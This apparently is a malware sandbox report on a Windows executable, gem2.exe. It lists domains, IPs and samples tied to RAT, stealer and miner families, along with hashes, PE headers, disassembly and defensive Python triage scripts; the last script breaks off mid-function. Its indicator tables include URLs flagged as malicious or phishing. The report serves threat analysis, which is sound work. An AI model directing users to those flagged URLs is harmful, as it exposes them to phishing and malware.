Match: default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com (domain)
Associated sample / URL | Detection | Threat name | Context (resolved IP)
Appraisal-nation-Review_and_Signature_Request46074.pdf | malicious | Unknown | 84.201.210.39
JB#40044 Order.exe | malicious | MassLogger RAT | 217.20.57.25
82eqjqLrzE.exe | malicious | AsyncRAT | 217.20.57.23
Solara.exe | malicious | Unknown | 217.20.57.35
Sales Acknowledgement - HES #982323.pdf | malicious | Unknown | 84.201.210.39
file_83f986ef2d0592ef993924a8cc5b8d6a_2025-01-07_10_04_01_718000.zip | malicious | Unknown | 217.20.57.36
Setup.exe | malicious | LummaC | 217.20.57.18
Insomia.exe | malicious | LummaC | 84.201.210.35
T1#U5b89#U88c5#U53052.0.6.msi | malicious | Unknown | 84.201.210.34
dGhlYXB0Z3JvdXA=-free.exe | malicious | Unknown | 84.201.210.22

Match: bg.microsoft.map.fastly.net (domain)
Associated sample / URL | Detection | Threat name | Context (resolved IP)
1736491685cd440ba02224486139c45779065ac91a3edb422c48d3d3c6920c4d30fc9d2bfc582.dat-decoded.exe | malicious | AsyncRAT, DcRat | 199.232.210.172
gqIYXW7GfB.exe | malicious | DCRat | 199.232.214.172
https://ik.imagekit.io/nrof2h909/Sherman%20Pruitt,%20Chief%20of%20Police,%20MSCJ.pdf?updatedAt=1736444487005 | malicious | Unknown | 199.232.210.172
https://marcuso-wq.github.io/home/ | malicious | HTMLPhisher | 199.232.214.172
1Ta6ojwHc6.exe | malicious | DCRat | 199.232.210.172
Nuevo-orden.xla.xlsx | malicious | Unknown | 199.232.214.172
Appraisal-nation-Review_and_Signature_Request46074.pdf | malicious | Unknown | 199.232.214.172
new.bat | malicious | Unknown | 199.232.210.172
MDE_File_Sample_c404ec52446527b77da6860ca493ea2007ac03d5.zip | malicious | Unknown | 199.232.210.172
JB#40044 Order.exe | malicious | MassLogger RAT | 199.232.210.172
Match: DFN Verein zur Foerderung eines Deutschen Forschungsnetzes e.V. (ASN)
Associated sample / URL | Detection | Threat name | Context (IP)
armv4l.elf | malicious | Unknown | 195.37.28.224
armv6l.elf | malicious | Unknown | 134.245.99.176
armv7l.elf | malicious | Unknown | 139.19.193.179
https://www.bing.com/ck/a?!&&p=3c39a9f42e445bf68e8df296bb1fae53d0c972b7afa34ab05d6ca3737dc8872cJmltdHM9MTczNjM4MDgwMA&ptn=3&ver=2&hsh=4&fclid=2ffa23fd-270b-62aa-06ef-300e230b6c77&u=a1aHR0cHM6Ly93d3cuYmluZy5jb20vYWxpbmsvbGluaz91cmw9aHR0cHMlM2ElMmYlMmZ3d3cuYWxwaGFzdXJhbmNlLmNvbSUyZiZzb3VyY2U9c2VycC1sb2NhbCZoPUE1Z0FJY1RpY2tXbGRHJTJidFFwJTJmY0dnQ3Z3Tmg4UmZjRXBwQmdUTGlNOEtNJTNkJnA9bHdfdHAmaWc9QTlFRTIyOTNCQzJGNDgyMDlGMTkyNEFBOUQ4MTUyNkYmeXBpZD1ZTjg3M3gxNzg2NjcxMDE2NTE1NDQyOTA3NA&ntb=1 | malicious | Unknown | 141.95.100.236
https://t.co/qNQo33w8wD | malicious | HTMLPhisher | 141.95.98.65
chrtrome22.exe | malicious | Xmrig | 141.94.96.144
http://hockey30.com | malicious | Unknown | 141.95.171.140
https://hockey30.com/nouvelles/malaise-en-conference-de-presse-kent-hughes-envoie-un-message-cinglant-a-juraj-slafkovsky/ | malicious | Unknown | 141.95.171.140
n397UdH3b5.exe | malicious | Wannacry, Conti | 131.188.40.189
174.exe | malicious | Xmrig | 141.94.96.144
                                                          No context
Match: C:\Windows\Temp\yycjbdwxjaoe.sys (dropped file)
Associated sample | Detection | Threat name
chrtrome22.exe | malicious | Xmrig
pTVKHqys2h.exe | malicious | Xmrig
174.exe | malicious | Xmrig
file.exe | malicious | LummaC, Amadey, LummaC Stealer, XWorm, Xmrig
47SXvEQ.exe | malicious | Blank Grabber, Xmrig
xmr new.exe | malicious | Xmrig
eth.exe | malicious | Xmrig
file.exe | malicious | Xmrig
hiwA7Blv7C.exe | malicious | Xmrig
5fr5gthkjdg71.exe | malicious | Quasar, R77 RootKit
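The dropped-file records that follow are a flat list of "Key:value" lines, one record per "Process:" line, and most of them are repeats: PowerShell writes its AppLocker policy test file several times with the same SHA-256, while the one record that matters is the PE32+ executable written by gem2.exe and flagged malicious. The script below is an added example, not Joe Sandbox code. It parses records in that layout, collapses identical content by SHA-256, checks that a preview starting with "MZ" agrees with the declared file type, flags a "Malicious:true" record that carries no AV detection, and recomputes the size and hashes of a local copy against a record so a file pulled from a host can be tied to the report. It assumes only the layout visible on this page (records start at "Process:", AV hits appear as "• Antivirus: ..." bullets under an "Antivirus:" line); the sample records are copied from this page with the PE preview shortened.

```python
"""Parse the report's dropped-file records and run analyst sanity checks.
Added example, not Joe Sandbox code. Assumes the record layout seen on this
page: a record starts at a 'Process:' line and is followed by 'Key:value'
lines, with AV hits as '• Antivirus: ...' bullets under an 'Antivirus:' line."""
import hashlib

HASHERS = {"MD5": hashlib.md5, "SHA1": hashlib.sha1,
           "SHA-256": hashlib.sha256, "SHA-512": hashlib.sha512}


def parse_records(text):
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("Process:"):
            cur = {"Antivirus": []}
            records.append(cur)
        if cur is None:
            continue
        if line.startswith("•"):
            cur["Antivirus"].append(line.lstrip("• ").strip())
            continue
        key, sep, value = line.partition(":")
        if sep and key.strip() != "Antivirus":  # keep the bullet list intact
            cur[key.strip()] = value.strip()
    return records


def is_pe(rec):
    """A preview starting with 'MZ' is the DOS header of a PE image."""
    return rec.get("Preview", "").startswith("MZ")


def unique_by_sha256(records):
    """Collapse repeated drops of identical content (same SHA-256)."""
    seen, out = set(), []
    for r in records:
        h = r.get("SHA-256", "").lower()
        if h and h not in seen:
            seen.add(h)
            out.append(r)
    return out


def check_record(rec):
    """Inconsistencies worth a second look; empty list means self-consistent."""
    issues = []
    if is_pe(rec) != ("PE32" in rec.get("File Type", "")):
        issues.append("preview and declared file type disagree")
    if float(rec.get("Entropy (8bit)", 0)) > 7.2 and rec.get("Encrypted", "").lower() == "false":
        issues.append("high entropy but not flagged as encrypted")
    if rec.get("Malicious", "").lower() == "true" and not rec.get("Antivirus"):
        issues.append("marked malicious without an AV detection")
    return issues


def verify_copy(data: bytes, rec):
    """Recompute hashes and size of a local copy; return the fields that disagree."""
    bad = [k for k, fn in HASHERS.items()
           if k in rec and fn(data).hexdigest().lower() != rec[k].lower()]
    if "Size (bytes)" in rec and int(rec["Size (bytes)"]) != len(data):
        bad.append("Size (bytes)")
    return bad


# Records copied from this page (PE preview shortened); raw string because of the backslashes.
SAMPLE_RECORDS = r"""
Process:C:\Users\user\Desktop\gem2.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):2876416
Entropy (8bit):6.537334125155787
Encrypted:false
MD5:990A3F3B1273510F210FB9B541DA219F
SHA1:33E536C5B4BDB6F6042F93445DFFD8A3AD488E8B
SHA-256:35A8D03F86AE6F92424D6424FE0805D338ECCEDFF177B400182102685299022C
SHA-512:495734313CAE980D3F48EF78422CF9484EB347833672FD5C693F8F8C92C1C0D51986795CD55A3148BE18FF0C9D36ADFF5A1C3FF18200668DD33F3978A459C246
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 66%
Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):64
Entropy (8bit):1.1940658735648508
Encrypted:false
MD5:851531B4FD612B0BC7891B3F401A478F
SHA-256:383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
Malicious:false
Preview:@...e.................................&..............@..........
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
"""

if __name__ == "__main__":
    for r in unique_by_sha256(parse_records(SAMPLE_RECORDS)):
        print(r["Process"], r["File Type"], r["Malicious"], check_record(r) or "ok")
```

On the sample the four records collapse to three distinct files, the only PE is the one dropped by gem2.exe with a ReversingLabs detection, and every record passes check_record; verify_copy returns an empty list only when a local file reproduces the recorded size and every hash present in the record.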
                                                                              Process:C:\Users\user\Desktop\gem2.exe
                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):2876416
                                                                              Entropy (8bit):6.537334125155787
                                                                              Encrypted:false
                                                                              SSDEEP:49152:lYul8CapE2jLY0vFhbkQbIptv1xZ4ayOIYDIGC3FYKjPgz+WWrS2sWioLyVQGMNx:lYLCGYYbkQbytvVeOIerC1zPgSWW/pio
                                                                              MD5:990A3F3B1273510F210FB9B541DA219F
                                                                              SHA1:33E536C5B4BDB6F6042F93445DFFD8A3AD488E8B
                                                                              SHA-256:35A8D03F86AE6F92424D6424FE0805D338ECCEDFF177B400182102685299022C
                                                                              SHA-512:495734313CAE980D3F48EF78422CF9484EB347833672FD5C693F8F8C92C1C0D51986795CD55A3148BE18FF0C9D36ADFF5A1C3FF18200668DD33F3978A459C246
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 66%
                                                                              Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d......g.........."..........N+.....@..........@.............................p,...........`.................................................x...<....P,.P.... ,..............`,.x...............................(.......8...............X............................text...f........................... ..`.rdata... ......."..................@..@.data....1+...... +.................@....pdata....... ,.......+.............@..@.00cfg.......0,.......+.............@..@.tls.........@,.......+.............@....rsrc...P....P,.......+.............@..@.reloc..x....`,.......+.............@..B........................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):64
                                                                              Entropy (8bit):1.1940658735648508
                                                                              Encrypted:false
                                                                              SSDEEP:3:Nlllul3nqth:NllUa
                                                                              MD5:851531B4FD612B0BC7891B3F401A478F
                                                                              SHA1:483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
                                                                              SHA-256:383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
                                                                              SHA-512:A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
                                                                              Malicious:false
                                                                              Preview:@...e.................................&..............@..........
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):64
                                                                              Entropy (8bit):1.1510207563435464
                                                                              Encrypted:false
                                                                              SSDEEP:3:Nlllul2lllllZ:NllUClll
                                                                              MD5:4D98AF7F487E62A9C1D44B02674BAB7E
                                                                              SHA1:1B492B2208949EB7F18C32F309C296B4258DBA65
                                                                              SHA-256:1E3ED9CE6343DA27C6759A0F05D6DD0B92B3A9C63B6492A2DA4E4F371D9F56DA
                                                                              SHA-512:60EC859B84836E865E767FE858E70ACEC6F0FB8077B2E51D6CB4095533433B791C9A16396D69279C7F896DF003A1ED6656087B43EFA16523DA4026317CBB49E6
                                                                              Malicious:false
                                                                              Preview:@...e.................................:..............@..........
                                                                               Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                               File Type:ASCII text, with no line terminators
                                                                               Category:dropped
                                                                               Size (bytes):60
                                                                               Entropy (8bit):4.038920595031593
                                                                               Encrypted:false
                                                                               SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                               MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                               SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                               SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                               SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                               Malicious:false
                                                                               Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                               Occurrences:4 (four identical dropped copies with the same content and hashes, each written by powershell.exe; the repeated listings are collapsed here). This is the probe file PowerShell itself writes at start-up to test AppLocker policy, not content authored by the sample.
                                                                              Process:C:\ProgramData\Screenshots\Lightshot.exe
                                                                              File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):14544
                                                                              Entropy (8bit):6.2660301556221185
                                                                              Encrypted:false
                                                                              SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                              MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                              SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                              SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                              SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 5%
                                                                               Joe Sandbox View (other samples that dropped this same file):
                                                                               • Filename: chrtrome22.exe, Detection: malicious
                                                                               • Filename: pTVKHqys2h.exe, Detection: malicious
                                                                               • Filename: 174.exe, Detection: malicious
                                                                               • Filename: file.exe, Detection: malicious
                                                                               • Filename: 47SXvEQ.exe, Detection: malicious
                                                                               • Filename: xmr new.exe, Detection: malicious
                                                                               • Filename: eth.exe, Detection: malicious
                                                                               • Filename: file.exe, Detection: malicious
                                                                               • Filename: hiwA7Blv7C.exe, Detection: malicious
                                                                               • Filename: 5fr5gthkjdg71.exe, Detection: malicious
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                                              File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                              Entropy (8bit):6.537334125155787
                                                                              TrID:
                                                                              • Win64 Executable GUI (202006/5) 92.65%
                                                                              • Win64 Executable (generic) (12005/4) 5.51%
                                                                              • Generic Win/DOS Executable (2004/3) 0.92%
                                                                              • DOS Executable Generic (2002/1) 0.92%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:gem2.exe
                                                                              File size:2'876'416 bytes
                                                                              MD5:990a3f3b1273510f210fb9b541da219f
                                                                              SHA1:33e536c5b4bdb6f6042f93445dffd8a3ad488e8b
                                                                              SHA256:35a8d03f86ae6f92424d6424fe0805d338eccedff177b400182102685299022c
                                                                              SHA512:495734313cae980d3f48ef78422cf9484eb347833672fd5c693f8f8c92c1c0d51986795cd55a3148be18ff0c9d36adff5a1c3ff18200668dd33f3978a459c246
                                                                              SSDEEP:49152:lYul8CapE2jLY0vFhbkQbIptv1xZ4ayOIYDIGC3FYKjPgz+WWrS2sWioLyVQGMNx:lYLCGYYbkQbytvVeOIerC1zPgSWW/pio
                                                                              TLSH:29D523E536CE4726C8143C71F4A6898918EF7A8AD3BBB1B7644483736A747B34DB7048
                                                                              File Content Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d......g.........."..........N+.....@..........@.............................p,...........`........................................
                                                                              Icon Hash:00928e8e8686b000
                                                                              Entrypoint:0x140001140
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x140000000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x678007E8 [Thu Jan 9 17:31:20 2025 UTC]
                                                                              TLS Callbacks:0x40001760, 0x1, 0x400017e0, 0x1
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:6
                                                                              OS Version Minor:0
                                                                              File Version Major:6
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:6
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:de41d4e0545d977de6ca665131bb479a
                                                                               Instruction (entrypoint disassembly as listed by the report; the x64 code is decoded in 32-bit mode, so each REX.W prefix byte 0x48 shows up as a spurious "dec eax" in front of the 64-bit instruction it belongs to, e.g. "dec eax / sub esp, 28h" is really "sub rsp, 28h")
                                                                              dec eax
                                                                              sub esp, 28h
                                                                              dec eax
                                                                              mov eax, dword ptr [00009ED5h]
                                                                              mov dword ptr [eax], 00000001h
                                                                              call 00007F5288D58BAFh
                                                                              nop
                                                                              nop
                                                                              nop
                                                                              dec eax
                                                                              add esp, 28h
                                                                              ret
                                                                              nop
                                                                              inc ecx
                                                                              push edi
                                                                              inc ecx
                                                                              push esi
                                                                              push esi
                                                                              push edi
                                                                              push ebx
                                                                              dec eax
                                                                              sub esp, 20h
                                                                              dec eax
                                                                              mov eax, dword ptr [00000030h]
                                                                              dec eax
                                                                              mov edi, dword ptr [eax+08h]
                                                                              dec eax
                                                                              mov esi, dword ptr [00009EC9h]
                                                                              xor eax, eax
                                                                              dec eax
                                                                              cmpxchg dword ptr [esi], edi
                                                                              sete bl
                                                                              je 00007F5288D58BD0h
                                                                              dec eax
                                                                              cmp edi, eax
                                                                              je 00007F5288D58BCBh
                                                                              dec esp
                                                                              mov esi, dword ptr [0000BAA9h]
                                                                              nop word ptr [eax+eax+00000000h]
                                                                              mov ecx, 000003E8h
                                                                              inc ecx
                                                                              call esi
                                                                              xor eax, eax
                                                                              dec eax
                                                                              cmpxchg dword ptr [esi], edi
                                                                              sete bl
                                                                              je 00007F5288D58BA7h
                                                                              dec eax
                                                                              cmp edi, eax
                                                                              jne 00007F5288D58B89h
                                                                              dec eax
                                                                              mov edi, dword ptr [00009E90h]
                                                                              mov eax, dword ptr [edi]
                                                                              cmp eax, 01h
                                                                              jne 00007F5288D58BAEh
                                                                              mov ecx, 0000001Fh
                                                                              call 00007F5288D618B4h
                                                                              jmp 00007F5288D58BC9h
                                                                              cmp dword ptr [edi], 00000000h
                                                                              je 00007F5288D58BABh
                                                                              mov byte ptr [002BED21h], 00000001h
                                                                              jmp 00007F5288D58BBBh
                                                                              mov dword ptr [edi], 00000001h
                                                                              dec eax
                                                                              mov ecx, dword ptr [00009E7Ah]
                                                                              dec eax
                                                                              mov edx, dword ptr [00009E7Bh]
                                                                              call 00007F5288D618ABh
                                                                              mov eax, dword ptr [edi]
                                                                              cmp eax, 01h
                                                                              jne 00007F5288D58BBBh
                                                                              dec eax
                                                                              mov ecx, dword ptr [00009E50h]
Data directories

Name                                 | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IMPORT         | 0xc978          | 0x3c         | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0x2c5000        | 0x350        | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x2c2000        | 0x18c        | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0x2c6000        | 0x78         | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_TLS            | 0xb0a0          | 0x28         | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0xb410          | 0x138        | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IAT            | 0xcb10          | 0x158        | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |
Sections

Name   | Virtual Address | Virtual Size | Raw Size | MD5                              | Xored PE | ZLIB Complexity     | File Type | Entropy             | Characteristics
.text  | 0x1000          | 0x9066       | 0x9200   | 0a4b4175ec481c50c984590193f52f1a | False    | 0.4883615154109589  | data      | 6.152703474213046   | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xb000          | 0x20cc       | 0x2200   | d031d7bab38efd70773bc93d35fb58a6 | False    | 0.45128676470588236 | data      | 4.641594651888488   | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data  | 0xe000          | 0x2b3190     | 0x2b2000 | 3a7c43391555cab936df087d609d1d01 | unknown  | unknown             | unknown   | unknown             | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x2c2000        | 0x18c        | 0x200    | 71971e4bff0784f885ec5f86f32b6a4a | False    | 0.521484375         | data      | 3.204851117192452   | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.00cfg | 0x2c3000        | 0x10         | 0x200    | b18c7380298e104adf73576fa46bccc1 | False    | 0.04296875          | data      | 0.15127132530476972 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls   | 0x2c4000        | 0x10         | 0x200    | bf619eac0cdf3f68d496ea9344137e8b | False    | 0.02734375          | data      | 0.0                 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc  | 0x2c5000        | 0x350        | 0x400    | 56e59519fb7d2369bbf7a9e80aa61940 | False    | 0.3642578125        | data      | 2.8188436463026587  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x2c6000        | 0x78         | 0x200    | 6490b02f8b3f1652073b3b9bdd2acfb4 | False    | 0.236328125         | data      | 1.4268248333801306  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
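The section and data-directory tables above are exactly what a static triage script reads first. What follows is an added example, not code from Joe Sandbox or from the sample's authors: it parses PE32+ headers with only the Python standard library and reports the traits those tables expose (one section carrying almost the whole file, a TLS directory whose callbacks run before the entrypoint, an empty security directory, and the NATIVE subsystem that marks the dropped file as a driver). The byte images it parses are constructed inline from the report's section layout with zero-filled bodies; `build_pe`, `parse_pe` and `triage` are this example's own names, and the "driver" image only mimics the dropped file's subsystem, not its contents.

```python
import struct

IMAGE_SUBSYSTEM_NATIVE = 1       # kernel-mode drivers (the dropped "PE32+ executable (native)" above)
IMAGE_SUBSYSTEM_WINDOWS_GUI = 2  # gem2.exe itself
DIR_SECURITY, DIR_TLS = 4, 9     # data-directory indices
IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE = 0x20000000, 0x80000000

# Section layout copied from the report's table: (name, VA, virtual size, raw size,
# characteristics). Bodies are zero-filled (constructed); only the headers matter here.
GEM2_SECTIONS = [
    (b".text",  0x1000,   0x9066,   0x9200,   0x60000020),
    (b".rdata", 0xb000,   0x20cc,   0x2200,   0x40000040),
    (b".data",  0xe000,   0x2b3190, 0x2b2000, 0xC0000040),
    (b".pdata", 0x2c2000, 0x18c,    0x200,    0x40000040),
    (b".00cfg", 0x2c3000, 0x10,     0x200,    0x40000040),
    (b".tls",   0x2c4000, 0x10,     0x200,    0xC0000040),
    (b".rsrc",  0x2c5000, 0x350,    0x400,    0x40000040),
    (b".reloc", 0x2c6000, 0x78,     0x200,    0x42000040),
]


def build_pe(sections, subsystem, tls_dir=(0, 0), security_dir=(0, 0)):
    """Assemble a minimal but structurally valid PE32+ image (constructed test input)."""
    e_lfanew, headers_size = 0x80, 0x400
    dos = (b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    file_hdr = struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, 0xF0, 0x22)
    dirs = [(0, 0)] * 16
    dirs[DIR_TLS], dirs[DIR_SECURITY] = tls_dir, security_dir
    opt = struct.pack("<HBBIIIIIQIIHHHHHHIIIIHHQQQQII",
                      0x20B, 14, 0, 0, 0, 0, 0x1140, 0x1000, 0x140000000, 0x1000, 0x200,
                      6, 0, 0, 0, 6, 0, 0, sections[-1][1] + 0x1000, headers_size, 0,
                      subsystem, 0x8160, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += b"".join(struct.pack("<II", va, size) for va, size in dirs)
    sec_hdrs, bodies, raw_ptr = b"", b"", headers_size
    for name, va, vsize, raw_size, chars in sections:
        sec_hdrs += struct.pack("<8sIIIIIIHHI", name, vsize, va, raw_size, raw_ptr, 0, 0, 0, 0, chars)
        bodies += b"\0" * raw_size
        raw_ptr += raw_size
    header = (dos + b"PE\0\0" + file_hdr + opt + sec_hdrs).ljust(headers_size, b"\0")
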